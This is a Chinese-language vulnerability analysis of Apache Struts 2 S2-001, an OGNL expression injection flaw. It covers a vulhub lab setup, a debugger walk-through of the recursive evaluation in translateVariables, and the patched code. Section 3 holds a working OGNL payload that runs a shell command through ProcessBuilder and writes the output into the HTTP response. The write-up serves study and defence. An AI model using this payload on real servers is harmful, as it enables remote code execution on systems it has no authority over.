一、漏洞信息
漏洞信息页面:
S2-001 - Apache Struts 2 Wiki - Apache Software Foundation
漏洞类型:
RCE(远程代码执行)
受影响组件:
WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8
漏洞成因:
WebWork 2.1+和 Struts 2的altSyntax特性允许将OGNL表达式插入到文本字符串中并递归处理。当恶意用户提交包含OGNL表达式的字符串,且将用户输入返回到当前页面时,服务器将执行该表达式。
二、环境搭建
IDE:Eclipse IDE for Enterprise Java and Web Developers
Java:JDK1.8
Tomcat:8.5.75
Struts:2.0.8(https://github.com/vulhub/vulhub/struts/s2-001)
三、漏洞利用
在username或password输入OGNL表达式语句即可触发漏洞。
执行任意命令并回显。
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
四、漏洞分析
1. Struts2相关
Struts2在接收用户请求后(⑥)以及发送响应前(⑧)会使用拦截器进行处理。
WEB-INF/classes目录下的struts.xml中显示了使用的拦截器为struts默认拦截器。
struts-default.xml位于struts2-core-2.0.8.jar中。关注params拦截器,该拦截器负责解析HTTP请求中的参数,并将参数值设置成Action对应的属性值。
2. 调试分析
找到params拦截器所在类,在doIntercept()函数中下断点。开始调试,web页面输入username为admin,password为%{2*3}。
运行到setParameters,该函数根据请求参数设置action。
继续运行到invocation.invoke(),步入函数。
后续函数调用栈如下
运行到index.jsp第14行,单步步入,直到运行到doStartTag()
doStartTag()开始处理struts标签。此时处理的是s:form标签。
在doStartTag()下断点,运行到处理password标签。
跳出doStartTag(),在index.jsp第16行password处再次单步步入,进入doEndTag,步入component.end函数。
跟踪到evaluateParams(),步入函数。
跟踪到addParameter(),由于开启了表达式语法,altSyntax()返回ture,expr变为%{password}
步入findValue(),跟踪到TextParseUtil.translateVariables,步入函数。
translateVariables函数源码如下
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
Object result = expression;
while (true) {
int start = expression.indexOf(open + "{");
int length = expression.length();
int x = start + 2;
int count = 1;
while (start != -1 && x < length && count != 0) {
char c = expression.charAt(x++);
if (c == '{') {
count++; continue;
} if (c == '}') {
count--;
}
}
int end = x - 1;
if (start != -1 && end != -1 && count == 0) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
if (o != null) {
if (TextUtils.stringSet(left)) {
result = left + o;
} else {
result = o;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + o + right;
continue;
}
result = left + right;
expression = left + right;
continue;
}
break;
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}
在while的第一次循环中,通过stack.findValue获取到password的值,即为输入%{2*3}
第一次循环结束时,expression和result被赋值为%{2*3}
在第二次循环中,通过stack.findValue,将var中内容执行,o被赋值为6
进入第三次循环,因为expression不为表达式,循环结束。
五、漏洞修复
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
int loopCount = 1;
int pos = 0;
while (true) {
int start = expression.indexOf(open + "{", pos);
if (start == -1) {
pos = 0;
loopCount++;
start = expression.indexOf(open + "{");
}
if (loopCount > maxLoopCount) { //默认只进行一次循环,不再递归解析
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;
if ((start != -1) && (end != -1) && (count == 0)) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
String middle = null;
if (o != null) {
middle = o.toString();
if (!TextUtils.stringSet(left)) {
result = o;
} else {
result = left + middle;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + middle + right;
} else {
// the variable doesn't exist, so don't display anything
result = left + right;
expression = left + right;
}
pos = (left != null && left.length() > 0 ? left.length() - 1: 0) +
(middle != null && middle.length() > 0 ? middle.length() - 1: 0) +
1;
pos = Math.max(pos, 1);
} else {
break;
}
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}